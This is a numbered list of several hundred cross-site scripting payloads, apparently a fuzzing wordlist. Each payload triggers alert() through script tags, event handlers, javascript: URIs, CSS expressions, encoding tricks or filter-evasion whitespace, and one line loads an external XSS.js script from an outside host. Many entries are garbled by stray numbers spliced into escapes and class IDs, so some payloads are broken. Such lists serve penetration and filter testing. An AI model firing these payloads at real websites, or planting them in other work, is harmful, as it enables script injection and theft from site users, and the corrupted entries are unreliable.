  1229. "`'><script>\xE2\x80\x80javascript:alert(1642)</script>
  1230. "`'><script>\x21643javascript:alert(1643)</script>
  1231. "`'><script>\xE2\x80\x82javascript:alert(1644)</script>
  1232. "`'><script>\xE2\x80\x86javascript:alert(1645)</script>
  1233. "`'><script>\xE1646\xA0\x8Ejavascript:alert(1646)</script>
  1234. "`'><script>\x0Bjavascript:alert(1647)</script>
  1235. "`'><script>\x20javascript:alert(1648)</script>
  1236. "`'><script>\xC2\xA0javascript:alert(1649)</script>
  1237. "/><img/onerror=\x0Bjavascript:alert(1650)\x0Bsrc=xxx:x />
  1238. "/><img/onerror=\x22javascript:alert(1651)\x22src=xxx:x />
  1239. "/><img/onerror=\x09javascript:alert(1652)\x09src=xxx:x />
  1240. "/><img/onerror=\x27javascript:alert(1653)\x27src=xxx:x />
  1241. "/><img/onerror=\x0Ajavascript:alert(1654)\x0Asrc=xxx:x />
  1242. "/><img/onerror=\x0Cjavascript:alert(1655)\x0Csrc=xxx:x />
  1243. "/><img/onerror=\x0Djavascript:alert(1656)\x0Dsrc=xxx:x />
  1244. "/><img/onerror=\x60javascript:alert(1657)\x60src=xxx:x />
  1245. "/><img/onerror=\x20javascript:alert(1658)\x20src=xxx:x />
  1246. <script\x2F>javascript:alert(1659)</script>
  1247. <script\x20>javascript:alert(1660)</script>
  1248. <script\x0D>javascript:alert(1661)</script>
  1249. <script\x0A>javascript:alert(1662)</script>
  1250. <script\x0C>javascript:alert(1663)</script>
  1251. <script\x00>javascript:alert(1664)</script>
  1252. <script\x09>javascript:alert(1665)</script>
  1253. "><img src=x onerror=javascript:alert(1666)>
  1254. "><img src=x onerror=javascript:alert(1667)>
  1255. "><img src=x onerror=javascript:alert(1668)>
  1256. "><img src=x onerror=javascript:alert(1669)>
  1257. "><img src=x onerror=javascript:alert(1670))>
  1258. "><img src=x onerror=javascript:alert(1671))>
  1259. "><img src=x onerror=javascript:alert(1672))>
  1260. "><img src=x onerror=javascript:alert(1673)>
  1261. "><img src=x onerror=javascript:alert(1674))>
  1262. "><img src=x onerror=javascript:alert(1675))>
  1263. "><img src=x onerror=javascript:alert(1676)>
  1264. "><img src=x onerror=javascript:alert(1677))>
  1265. "><img src=x onerror=javascript:alert(1678)>
  1266. "><img src=x onerror=javascript:alert(1679))>
  1267. "><img src=x onerror=javascript:alert(1680)>
  1268. `"'><img src=xxx:x onerror\x0B=javascript:alert(1681)>
  1269. `"'><img src=xxx:x onerror\x00=javascript:alert(1682)>
  1270. `"'><img src=xxx:x onerror\x0C=javascript:alert(1683)>
  1271. `"'><img src=xxx:x onerror\x0D=javascript:alert(1684)>
  1272. `"'><img src=xxx:x onerror\x20=javascript:alert(1685)>
  1273. `"'><img src=xxx:x onerror\x0A=javascript:alert(1686)>
  1274. `"'><img src=xxx:x onerror\x09=javascript:alert(1687)>
  1275. <script>javascript:alert(1688)<\x00/script>
  1276. <img src=# onerror\x3D"javascript:alert(1689)" >
  1277. <input onfocus=javascript:alert(1690) autofocus>
  1278. <input onblur=javascript:alert(1691) autofocus><input autofocus>
  1279. <video poster=javascript:javascript:alert(1692)//
  1280. <body onscroll=javascript:alert(1693)><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><input autofocus>
  1281. <form id=test onforminput=javascript:alert(1694)><input></form><button form=test onformchange=javascript:alert(1694)>X
  1282. <video><source onerror="javascript:javascript:alert(1695)">
  1283. <video onerror="javascript:javascript:alert(1696)"><source>
  1284. <form><button formaction="javascript:javascript:alert(1697)">X
  1285. <body oninput=javascript:alert(1698)><input autofocus>
  1286. <math href="javascript:javascript:alert(1699)">CLICKME</math>  <math> <maction actiontype="statusline#http://google.com" xlink:href="javascript:javascript:alert(1699)">CLICKME</maction> </math>
  1287. <frameset onload=javascript:alert(1700)>
  1288. <table background="javascript:javascript:alert(1701)">
  1289. <!--<img src="--><img src=x onerror=javascript:alert(1702)//">
  1290. <comment><img src="</comment><img src=x onerror=javascript:alert(1703))//">
  1291. <![><img src="]><img src=x onerror=javascript:alert(1704)//">
  1292. <style><img src="</style><img src=x onerror=javascript:alert(1705)//">
  1293. <li style=list-style:url() onerror=javascript:alert(1706)> <div style=content:url(data:image/svg+xml,%%3Csvg/%%3E);visibility:hidden onload=javascript:alert(1706)></div>
  1294. <head><base href="javascript://"></head><body><a href="/. /,javascript:alert(1707)//#">XXX</a></body>
  1295. <SCRIPT FOR=document EVENT=onreadystatechange>javascript:alert(1708)</SCRIPT>
  1296. <OBJECT CLASSID="clsid:333C7BC4-460F-17091709D0-BC04-0080C7055A83"><PARAM NAME="DataURL" VALUE="javascript:alert(1709)"></OBJECT>
  1297. <b <script>alert(1712)</script>0
  1298. <div id="div1713"><input value="``onmouseover=javascript:alert(1713)"></div> <div id="div2"></div><script>document.getElementById("div2").innerHTML = document.getElementById("div1713").innerHTML;</script>
  1299. <x '="foo"><x foo='><img src=x onerror=javascript:alert(1714)//'>
  1300. <embed src="javascript:alert(1715)">
  1301. <img src="javascript:alert(1716)">
  1302. <image src="javascript:alert(1717)">
  1303. <script src="javascript:alert(1718)">
  1304. <div style=width:1719px;filter:glow onfilterchange=javascript:alert(1719)>x
  1305. <? foo="><script>javascript:alert(1720)</script>">
  1306. <! foo="><script>javascript:alert(1721)</script>">
  1307. </ foo="><script>javascript:alert(1722)</script>">
  1308. <? foo="><x foo='?><script>javascript:alert(1723)</script>'>">
  1309. <! foo="[[[Inception]]"><x foo="]foo><script>javascript:alert(1724)</script>">
  1310. <% foo><x foo="%><script>javascript:alert(1725)</script>">
  1311. <div id=d><x xmlns="><iframe onload=javascript:alert(1726)"></div> <script>d.innerHTML=d.innerHTML</script>
  1312. <img \x00src=x onerror="alert(1727)">
  1313. <img \x47src=x onerror="javascript:alert(1728)">
  1314. <img \x17291729src=x onerror="javascript:alert(1729)">
  1315. <img \x17302src=x onerror="javascript:alert(1730)">
  1316. <img\x47src=x onerror="javascript:alert(1731)">
  1317. <img\x17320src=x onerror="javascript:alert(1732)">
  1318. <img\x17333src=x onerror="javascript:alert(1733)">
  1319. <img\x32src=x onerror="javascript:alert(1734)">
  1320. <img\x47src=x onerror="javascript:alert(1735)">
  1321. <img\x17361736src=x onerror="javascript:alert(1736)">
  1322. <img \x47src=x onerror="javascript:alert(1737)">
  1323. <img \x34src=x onerror="javascript:alert(1738)">
  1324. <img \x39src=x onerror="javascript:alert(1739)">
  1325. <img \x00src=x onerror="javascript:alert(1740)">
  1326. <img src\x09=x onerror="javascript:alert(1741)">
  1327. <img src\x17420=x onerror="javascript:alert(1742)">
  1328. <img src\x17433=x onerror="javascript:alert(1743)">
  1329. <img src\x32=x onerror="javascript:alert(1744)">
  1330. <img src\x17452=x onerror="javascript:alert(1745)">
  1331. <img src\x17461746=x onerror="javascript:alert(1746)">
  1332. <img src\x00=x onerror="javascript:alert(1747)">
  1333. <img src\x47=x onerror="javascript:alert(1748)">
  1334. <img src=x\x09onerror="javascript:alert(1749)">
  1335. <img src=x\x17500onerror="javascript:alert(1750)">
  1336. <img src=x\x17511751onerror="javascript:alert(1751)">
  1337. <img src=x\x17522onerror="javascript:alert(1752)">
  1338. <img src=x\x17533onerror="javascript:alert(1753)">
  1339. <img[a][b][c]src[d]=x[e]onerror=[f]"alert(1754)">
  1340. <img src=x onerror=\x09"javascript:alert(1755)">
  1341. <img src=x onerror=\x17560"javascript:alert(1756)">
  1342. <img src=x onerror=\x17571757"javascript:alert(1757)">
  1343. <img src=x onerror=\x17582"javascript:alert(1758)">
  1344. <img src=x onerror=\x32"javascript:alert(1759)">
  1345. <img src=x onerror=\x00"javascript:alert(1760)">
  1346. <a href=java&#1761&#2&#3&#4&#5&#6&#7&#8&#17611761&#17612script:javascript:alert(1761)>XXX</a>
  1347. <img src="x` `<script>javascript:alert(1762)</script>"` `>
  1348. <img src onerror /" '"= alt=javascript:alert(1763)//">
  1349. <title onpropertychange=javascript:alert(1764)></title><title title=>
  1350. <a href=http://foo.bar/#x=`y></a><img alt="`><img src=x:x onerror=javascript:alert(1765)></a>">
  1351. <!--[if]><script>javascript:alert(1766)</script -->
  1352. <!--[if<img src=x onerror=javascript:alert(1767)//]> -->
  1353. <object id="x" classid="clsid:CB927D17702-4FF7-4a9e-A177069-56E4B8A75598"></object> <object classid="clsid:02BF25D5-8C17707-4B23-BC80-D3488ABDDC6B" onqt_error="javascript:alert(1770)" style="behavior:url(#x);"><param name=postdomevents /></object>
  1354. <a style="-o-link:'javascript:javascript:alert(1771)';-o-link-source:current">X
  1355. <style>p[foo=bar{}*{-o-link:'javascript:javascript:alert(1772)'}{}*{-o-link-source:current}]{color:red};</style>
  1356. <link rel=stylesheet href=data:,*%7bx:expression(javascript:alert(1773))%7d
  1357. <style>@import "data:,*%7bx:expression(javascript:alert(1774))%7D";</style>
  1358. <a style="pointer-events:none;position:absolute;"><a style="position:absolute;" onclick="javascript:alert(1775);">XXX</a></a><a href="javascript:javascript:alert(1775)">XXX</a>
  1359. <// style=x:expression\28javascript:alert(1779)\29>
  1360. <style>*{x:expression(javascript:alert(1780))}</style>
  1361. <div style="list-style:url(http://foo.f)\20url(javascript:javascript:alert(1782));">X
  1362. <script>({set/**/$($){_/**/setter=$,_=javascript:alert(1788)}}).$=eval</script>
  1363. <script>({0:#0=eval/#0#/#0#(javascript:alert(1789))})</script>
  1364. <script>ReferenceError.prototype.__defineGetter__('name', function(){javascript:alert(1790)}),x</script>
  1365. <script>Object.__noSuchMethod__ = Function,[{}][0].constructor._('javascript:alert(1791)')()</script>
  1366. <meta charset="mac-farsi">¼script¾javascript:alert(1794)¼/script¾
  1367. X<x style=`behavior:url(#default#time2)` onbegin=`javascript:alert(1795)` >
  1368. 1796<set/xmlns=`urn:schemas-microsoft-com:time` style=`beh&#x41796vior:url(#default#time2)` attributename=`innerhtml` to=`<img/src="x"onerror=javascript:alert(1796)>`>
  1369. 1797<animate/xmlns=urn:schemas-microsoft-com:time style=behavior:url(#default#time2) attributename=innerhtml values=<img/src="."onerror=javascript:alert(1797)>>
  1370. 1799<a href=#><line xmlns=urn:schemas-microsoft-com:vml style=behavior:url(#default#vml);position:absolute href=javascript:javascript:alert(1799) strokecolor=white strokeweight=1799000px from=0 to=1799000 /></a>
  1371. <a style="behavior:url(#default#AnchorClick);" folder="javascript:javascript:alert(1800)">XXX</a>
  1372. <event-source src="%(event)s" onload="javascript:alert(1803)">
  1373. <a href="javascript:javascript:alert(1804)"><event-source src="data:application/x-dom-event-stream,Event:click%0Adata:XXX%0A%0A">
  1374. <div id="x">x</div> <xml:namespace prefix="t"> <import namespace="t" implementation="#default#time2"> <t:set attributeName="innerHTML" targetElement="x" to="<img&#18051805;src=x:x&#18051805;onerror&#18051805;=javascript:alert(1805)>">
  1375. <script>javascript:alert(1809)</script>
  1376. <IMG SRC="javascript:javascript:alert(1810);">
  1377. <IMG SRC=javascript:javascript:alert(1811)>
  1378. <IMG SRC=`javascript:javascript:alert(1812)`>
  1379. <FRAMESET><FRAME SRC="javascript:javascript:alert(1814);"></FRAMESET>
  1380. <BODY ONLOAD=javascript:alert(1815)>
  1381. <BODY ONLOAD=javascript:javascript:alert(1816)>
  1382. <IMG SRC="jav ascript:javascript:alert(1817);">
  1383. <BODY onload!#$%%&()*~+-_.,:;?@[/|\]^`=javascript:alert(1818)>
  1384. <IMG SRC="javascript:javascript:alert(1821)"
  1385. <INPUT TYPE="IMAGE" SRC="javascript:javascript:alert(1823);">
  1386. <IMG DYNSRC="javascript:javascript:alert(1824)">
  1387. <IMG LOWSRC="javascript:javascript:alert(1825)">
  1388. <BGSOUND SRC="javascript:javascript:alert(1826);">
  1389. <BR SIZE="&{javascript:alert(1827)}">
  1390. <LINK REL="stylesheet" HREF="javascript:javascript:alert(1829);">
  1391. <STYLE>li {list-style-image: url("javascript:javascript:alert(1833)");}</STYLE><UL><LI>XSS
  1392. <META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:javascript:alert(1834);">
  1393. <META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:javascript:alert(1835);">
  1394. <IFRAME SRC="javascript:javascript:alert(1836);"></IFRAME>
  1395. <TABLE BACKGROUND="javascript:javascript:alert(1837)">
  1396. <TABLE><TD BACKGROUND="javascript:javascript:alert(1838)">
  1397. <DIV STYLE="background-image: url(javascript:javascript:alert(1839))">
  1398. <DIV STYLE="width:expression(javascript:alert(1840));">
  1399. <IMG STYLE="xss:expr/*XSS*/ession(javascript:alert(1841))">
  1400. <XSS STYLE="xss:expression(javascript:alert(1842))">
  1401. <STYLE TYPE="text/javascript">javascript:alert(1843);</STYLE>
  1402. <STYLE>.XSS{background-image:url("javascript:javascript:alert(1844)");}</STYLE><A CLASS=XSS></A>
  1403. <STYLE type="text/css">BODY{background:url("javascript:javascript:alert(1845)")}</STYLE>
  1404. <!--[if gte IE 4]><SCRIPT>javascript:alert(1846);</SCRIPT><![endif]-->
  1405. <BASE HREF="javascript:javascript:alert(1847);//">
  1406. <OBJECT classid=clsid:ae24fdae-03c6-18491849d1849-8b76-0080c744f389><param name=url value=javascript:javascript:alert(1849)></OBJECT>
  1407. <HTML xmlns:xss><?import namespace="xss" implementation="%(htc)s"><xss:xss>XSS</xss:xss></HTML>""","XML namespace."),("""<XML ID="xss"><I><B><IMG SRC="javas<!-- -->cript:javascript:alert(1850)"></B></I></XML><SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN>
  1408. <HTML><BODY><?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"><?import namespace="t" implementation="#default#time2"><t:set attributeName="innerHTML" to="XSS<SCRIPT DEFER>javascript:alert(1851)</SCRIPT>"></BODY></HTML>
  1409. <form id="test" /><button form="test" formaction="javascript:javascript:alert(1854)">X
  1410. <body onscroll=javascript:alert(1855)><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><input autofocus>
  1411. <P STYLE="behavior:url('#default#time2')" end="0" onEnd="javascript:alert(1856)">
  1412. <STYLE>a{background:url('s1858' 's2)}@import javascript:javascript:alert(1858);');}</STYLE>
  1413. <meta charset= "x-imap4-modified-utf7"&&>&&<script&&>javascript:alert(1859)&&;&&<&&/script&&>
  1414. <SCRIPT onreadystatechange=javascript:javascript:alert(1860);></SCRIPT>
  1415. <style onreadystatechange=javascript:javascript:alert(1861);></style>
  1416. <?xml version="1862.0"?><html:html xmlns:html='http://www.w3.org/1862999/xhtml'><html:script>javascript:alert(1862);</html:script></html:html>
  1417. <embed code=javascript:javascript:alert(1864);></embed>
  1418. <frameset onload=javascript:javascript:alert(1866)></frameset>
  1419. <object onerror=javascript:javascript:alert(1867)>
  1420. <XML ID=I><X><C><![CDATA[<IMG SRC="javas]]<![CDATA[cript:javascript:alert(1869);">]]</C><X></xml>
  1421. <IMG SRC=&{javascript:alert(1870);};>
  1422. <a href="jav&#65ascript:javascript:alert(1871)">test1871</a>
  1423. <a href="jav&#97ascript:javascript:alert(1872)">test1872</a>
  1424. <iframe srcdoc="&LT;iframe&sol;srcdoc=<img&sol;src=&apos;&apos;onerror=javascript:alert(1874)>>">
  1425. ';alert(1875))//';alert(1875))//";
  1426. alert(1876))//";alert(1876))//--
  1427. ></SCRIPT>">'><SCRIPT>alert(1877))</SCRIPT>
  1428. <IMG SRC="javascript:alert(1880);">
  1429. <IMG SRC=javascript:alert(1881)>
  1430. <IMG SRC=JaVaScRiPt:alert(1882)>
  1431. <IMG SRC=javascript:alert(1883)>
  1432. <IMG SRC=`javascript:alert(1884)`>
  1433. <a onmouseover="alert(1885)">xxs link</a>
  1434. <a onmouseover=alert(1886)>xxs link</a>
  1435. <IMG """><SCRIPT>alert(1887)</SCRIPT>">
  1436. <IMG SRC=javascript:alert(1888))>
  1437. <IMG SRC=# onmouseover="alert(1889)">
  1438. <IMG SRC= onmouseover="alert(1890)">
  1439. <IMG onmouseover="alert(1891)">
  1440. <IMG SRC="jav ascript:alert(1895);">
  1441. <IMG SRC="jav        ascript:alert(1896);">
  1442. <IMG SRC="jav
  1443. ascript:alert(1897);">
  1444. <IMG SRC="jav
    ascript:alert(1898);">
  1445. perl -e 'print "<IMG SRC=java\0script:alert(1899)>";' > out
  1446. <IMG SRC=" &#14;  javascript:alert(1900);">
  1447. <BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(1902)>
  1448. <<SCRIPT>alert(1904);//<</SCRIPT>
  1449. <IMG SRC="javascript:alert(1907)"
  1450. \";alert(1909);//
  1451. </TITLE><SCRIPT>alert(1910);</SCRIPT>
  1452. <INPUT TYPE="IMAGE" SRC="javascript:alert(1911);">
  1453. <BODY BACKGROUND="javascript:alert(1912)">
  1454. <IMG DYNSRC="javascript:alert(1913)">
  1455. <IMG LOWSRC="javascript:alert(1914)">
  1456. <STYLE>li {list-style-image: url("javascript:alert(1915)");}</STYLE><UL><LI>XSS</br>
  1457. <BODY ONLOAD=alert(1918)>
  1458. <BGSOUND SRC="javascript:alert(1919);">
  1459. <BR SIZE="&{alert(1920)}">
  1460. <LINK REL="stylesheet" HREF="javascript:alert(1921);">
  1461. <STYLE>@im\port'\ja\vasc\ript:alert(1926)';</STYLE>
  1462. <IMG STYLE="xss:expr/*XSS*/ession(alert(1927))">
  1463. exp/*<A STYLE='no\xss:noxss("*//*");xss:ex/*XSS*//*/*/pression(alert(1928))'>
  1464. <STYLE TYPE="text/javascript">alert(1929);</STYLE>
  1465. <STYLE>.XSS{background-image:url("javascript:alert(1930)");}</STYLE><A CLASS=XSS></A>
  1466. <STYLE type="text/css">BODY{background:url("javascript:alert(1931)")}</STYLE>
  1467. <STYLE type="text/css">BODY{background:url("javascript:alert(1932)")}</STYLE>
  1468. <XSS STYLE="xss:expression(alert(1933))">
  1469. ¼script¾alert(1935)¼/script¾
  1470. <META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert(1936);">
  1471. <META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert(1938);">
  1472. <IFRAME SRC="javascript:alert(1939);"></IFRAME>
  1473. <IFRAME SRC=# onmouseover="alert(1940)"></IFRAME>
  1474. <FRAMESET><FRAME SRC="javascript:alert(1941);"></FRAMESET>
  1475. <TABLE BACKGROUND="javascript:alert(1942)">
  1476. <TABLE><TD BACKGROUND="javascript:alert(1943)">
  1477. <DIV STYLE="background-image: url(javascript:alert(1944))">
  1478. <DIV STYLE="background-image: url(&#1;javascript:alert(1946))">
  1479. <DIV STYLE="width: expression(alert(1947));">
  1480. <BASE HREF="javascript:alert(1948);//">
  1481. <? echo('<SCR)';echo('IPT>alert(1953)</SCRIPT>'); ?>
  1482. <META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert(1956)</SCRIPT>">
  1483. <HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-alert(1957);+ADw-/SCRIPT+AD4-
  1484. <img src=``&NewLine; onerror=alert(1977)&NewLine;
  1485. <script /**/>/**/alert(1981)/**/</script /**/
  1486. <iframe/src="data:text/html,<svg &#198319831983;&#198319830;load=alert(1983)>">
  1487. <meta content="&NewLine; 1984 &NewLine;; JAVASCRIPT&colon; alert(1984)" http-equiv="refresh"/>
  1488. <form><iframe         ䷐&#19921992; src="javascript:alert(1992)"&#19921992;䷐        ;>
  1489. http://www.google<script .com>alert(1994)</script
  1490. <script ^__^>alert(1998))</script ^__^
  1491. </style  ><script   :-(>/**/alert(1999)/**/</script   :-(
  1492. &#00;</form><input type"date" onfocus="alert(2000)">
  1493. <a href="javascript:void(0)" onmouseover=&NewLine;javascript:alert(2004)&NewLine;>X</a>
  1494. <script ~~~>alert(2005)</script ~~~>
  1495. <iframe// src=javaSCRIPT&colon;alert(2013)
  1496. <%<!--'%><script>alert(2030);</script -->
  1497. <script src="data:text/javascript,alert(2031)"></script>
  1498. <iframe/onreadystatechange=alert(2033)
  1499. <svg/onload=alert(2034)
  1500. <input type="text" value=`` <div/onmouseover='alert(2036)'>X</div>
  1501. <img src=`xx:xx`onerror=alert(2038)>
  1502. <meta http-equiv="refresh" content="0;javascript&colon;alert(2040)"/>
  1503. <script>+-+-2050-+-+alert(2050)</script>
  1504. <body/onload=<!-->&#20510alert(2051)>
  1505. <script itworksinallbrowsers>/*<script* */alert(2052)</script
  1506. <img src ?itworksonchrome?\/onerror = alert(2053)
  1507. <svg><script onlypossibleinopera:-)> alert(2055)
  1508. <script x> alert(2057) </script 2057=2
  1509. <div/onmouseover='alert(2058)'> style="x:">
  1510. <--`<img/src=` onerror=alert(2059)> --!>
  1511. <div style="position:absolute;top:0;left:0;width:206100%;height:206100%" onmouseover="prompt(2061)" onclick="alert(2061)">x</button>
  1512. <form><button formaction=javascript&colon;alert(2063)>CLICKME
  1513. <script>alert(2071);</script>
  1514. <script>alert(2072);</script>
  1515. <IMG SRC="javascript:alert(2073);">
  1516. <IMG SRC=javascript:alert(2074)>
  1517. <IMG SRC=javascript:alert(2075)>
  1518. <IMG SRC=javascript:alert(2076)>
  1519. <IMG """><SCRIPT>alert(2077)</SCRIPT>">
  1520. <scr<script>ipt>alert(2078);</scr</script>ipt>
  1521. <script>alert(2079))</script>
  1522. <img src=foo.png onerror=alert(2080) />
  1523. <style>@im\port'\ja\vasc\ript:alert(2081)';</style>
  1524. <? echo('<scr)'; echo('ipt>alert(2082)</script>'); ?>
  1525. <marquee><script>alert(2083)</script></marquee>
  1526. <IMG SRC=\"jav        ascript:alert(2084);\">
  1527. <IMG SRC=\"jav
  1528. ascript:alert(2085);\">
  1529. <IMG SRC=\"jav
    ascript:alert(2086);\">
  1530. <IMG SRC=javascript:alert(2087))>
  1531. "><script>alert(2088)</script>
  1532. </title><script>alert(2090)</script>
  1533. </textarea><script>alert(2091)</script>
  1534. <IMG LOWSRC=\"javascript:alert(2092)\">
  1535. <IMG DYNSRC=\"javascript:alert(2093)\">
  1536. <font style='color:expression(alert(2094))'>
  1537. <img src="javascript:alert(2095)">
  1538. <script language="JavaScript">alert(2096)</script>
  1539. <body onunload="javascript:alert(2097);">
  1540. <body onLoad="alert(2098);"
  1541. [color=red' onmouseover="alert(2099)"]mouse over[/color]
  1542. "/></a></><img src=2100.gif onerror=alert(2100)>
  1543. window.alert(2101);
  1544. alert(2103));'))">
  1545. <iframe<?php echo chr(11)?> onload=alert(2104)></iframe>
  1546. "><script alert(2105))</script>
  1547. '">><script>alert(2107)</script>
  1548. <META HTTP-EQUIV=\"refresh\" CONTENT=\"0;url=javascript:alert(2109);\">
  1549. <META HTTP-EQUIV=\"refresh\" CONTENT=\"0; URL=http://;URL=javascript:alert(2110);\">
  1550. <script>2111 2111 = 1; alert(2111)</script>
  1551. <STYLE type="text/css">BODY{background:url("javascript:alert(2112)")}</STYLE>
  1552. <?='<SCRIPT>alert(2113)</SCRIPT>'?>
  1553. " onfocus=alert(2115) "> <"
  1554. <FRAMESET><FRAME SRC=\"javascript:alert(2116);\"></FRAMESET>
  1555. <STYLE>li {list-style-image: url(\"javascript:alert(2117)\");}</STYLE><UL><LI>XSS
  1556. perl -e 'print \"<SCR\0IPT>alert(2118)</SCR\0IPT>\";' > out
  1557. perl -e 'print \"<IMG SRC=java\0script:alert(2119)>\";' > out
  1558. <br size=\"&{alert(2120)}\">
  1559. <scrscriptipt>alert(2121)</scrscriptipt>
  1560. </br style=a:expression(alert(21222122>
  1561. </script><script>alert(2123)</script>
  1562. "><BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(2124)>
  1563. [color=red width=expression(alert(2125))][color]
  1564. <BASE HREF="javascript:alert(2126);//">
  1565. "></iframe><script>alert(2128)</script>
  1566. <body onLoad="while(true) alert(2129);">
  1567. '"></title><script>alert(2130)</script>
  1568. </textarea>'"><script>alert(2131)</script>
  1569. '""><script language="JavaScript"> alert(2132);</script>
  1570. </script></script><<<<script><>>>><<<script>alert(2133)</script>
  1571. <INPUT TYPE="IMAGE" SRC="javascript:alert(2135);">
  1572. '></select><script>alert(2136)</script>
  1573. a="get";b="URL";c="javascript:";d="alert(2140);";eval(a+b+c+d);
  1574. ='><script>alert(2141)</script>
  1575. <body background=javascript:'"><script>alert(2143)</script>></body>
  1576. ">/XaDoS/><script>alert(2144)</script><script src="http://www.site.com/XSS.js"></script>
  1577. ">/KinG-InFeT.NeT/><script>alert(2145)</script>
  1578. !--" /><script>alert(2148);</script>
  1579. <script>alert(2149)</script><marquee><h1>XSS by xss</h1></marquee>
  1580. "><script>alert(2150)</script>><marquee><h1>XSS by xss</h1></marquee>
  1581. '"></title><script>alert(2151)</script>><marquee><h1>XSS by xss</h1></marquee>
  1582. <img """><script>alert(2152)</script><marquee><h1>XSS by xss</h1></marquee>
  1583. <script>alert(2153)</script><marquee><h1>XSS by xss</h1></marquee>
  1584. "><script>alert(2154)</script>"><script>alert("XSS by \nxss</h1></marquee>
  1585. '"></title><script>alert(2155)</script>><marquee><h1>XSS by xss</h1></marquee>
  1586. <iframe src="javascript:alert(2156);"></iframe><marquee><h1>XSS by xss</h1></marquee>
  1587. '><SCRIPT>alert(2157))</SCRIPT><img src="" alt='
  1588. "><SCRIPT>alert(2158))</SCRIPT><img src="" alt="
  1589. \'><SCRIPT>alert(2159))</SCRIPT><img src="" alt=\'
  1590. '); alert(2162); var x='
  1591. \\'); alert(2163);var x=\'
  1592. //--></SCRIPT><SCRIPT>alert(2164));
  1593. >"><ScRiPt%20%0a%0d>alert(2165)%3B</ScRiPt>
  1594. <SCRIPT> alert(2170); </SCRIPT>
  1595. <BODY ONLOAD=alert(2171)>
  1596. <BODY BACKGROUND="javascript:alert(2172)">
  1597. <IMG SRC="javascript:alert(2173);">
  1598. <IMG DYNSRC="javascript:alert(2174)">
  1599. <IMG LOWSRC="javascript:alert(2175)">
  1600. <INPUT TYPE="IMAGE" SRC="javascript:alert(2177);">
  1601. <LINK REL="stylesheet" HREF="javascript:alert(2178);">
  1602. <TABLE BACKGROUND="javascript:alert(2179)">
  1603. <TD BACKGROUND="javascript:alert(2180)">
  1604. <DIV STYLE="background-image: url(javascript:alert(2181))">
  1605. <DIV STYLE="width: expression(alert(2182));">
  1606. &apos;;alert(2185))//\&apos;;alert(2185))//";alert(2185))//\";alert(2185))//--></SCRIPT>">&apos;><SCRIPT>alert(2185))</SCRIPT>
  1607. <SCRIPT>alert(2187)</SCRIPT>
  1608. <SCRIPT>alert(2189))</SCRIPT>
  1609. <BASE HREF="javascript:alert(2190);//">
  1610. <BGSOUND SRC="javascript:alert(2191);">
  1611. <BODY BACKGROUND="javascript:alert(2192);">
  1612. <BODY ONLOAD=alert(2193)>
  1613. <DIV STYLE="background-image: url(javascript:alert(2194))">
  1614. <DIV STYLE="background-image: url(&#1;javascript:alert(2195))">
  1615. <DIV STYLE="width: expression(alert(2196));">
  1616. <FRAMESET><FRAME SRC="javascript:alert(2197);"></FRAMESET>
  1617. <IFRAME SRC="javascript:alert(2198);"></IFRAME>
  1618. <INPUT TYPE="IMAGE" SRC="javascript:alert(2199);">
  1619. <IMG SRC="javascript:alert(2200);">
  1620. <IMG SRC=javascript:alert(2201)>
  1621. <IMG DYNSRC="javascript:alert(2202);">
  1622. <IMG LOWSRC="javascript:alert(2203);">
  1623. <STYLE>li {list-style-image: url("javascript:alert(2207)");}</STYLE><UL><LI>XSS
  1624. %BCscript%BEalert(2211)%BC/script%BE
  1625. <META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert(2212);">
  1626. <META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert(2214);">
  1627. <OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:alert(2217)></OBJECT>
  1628. a="get";&#10;b="URL("";&#10;c="javascript:";&#10;d="alert(2219);")";
  1629. eval(a+b+c+d);
  1630. <STYLE TYPE="text/javascript">alert(2220);</STYLE>
  1631. <IMG STYLE="xss:expr/*XSS*/ession(alert(2221))">
  1632. <XSS STYLE="xss:expression(alert(2222))">
  1633. <STYLE>.XSS{background-image:url("javascript:alert(2223)");}</STYLE><A CLASS=XSS></A>
  1634. <STYLE type="text/css">BODY{background:url("javascript:alert(2224)")}</STYLE>
  1635. <LINK REL="stylesheet" HREF="javascript:alert(2225);">
  1636. <TABLE BACKGROUND="javascript:alert(2230)"></TABLE>
  1637. <TABLE><TD BACKGROUND="javascript:alert(2231)"></TD></TABLE>
  1638. <XML ID=I><X><C><![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert(2233);">]]>
  1639. <XML ID="xss"><I><B><IMG SRC="javas<!-- -->cript:alert(2234)"></B></I></XML>
  1640. <META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert(2238)</SCRIPT>">
  1641. <BR SIZE="&{alert(2243)}">
  1642. <IMG SRC=JaVaScRiPt:alert(2244)>
  1643. <IMG SRC=javascript:alert(2245)>
  1644. <IMG SRC=`javascript:alert(2246)`>
  1645. <IMG SRC=javascript:alert(2247))>
  1646. <HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-alert(2252);+ADw-/SCRIPT+AD4-
  1647. \";alert(2253);//
  1648. </TITLE><SCRIPT>alert(2254);</SCRIPT>
  1649. <STYLE>@im\port&apos;\ja\vasc\ript:alert(2255)&apos;;</STYLE>
  1650. <IMG SRC="jav        ascript:alert(2256);">
  1651. <IMG SRC="jav&#x09;ascript:alert(2257);">
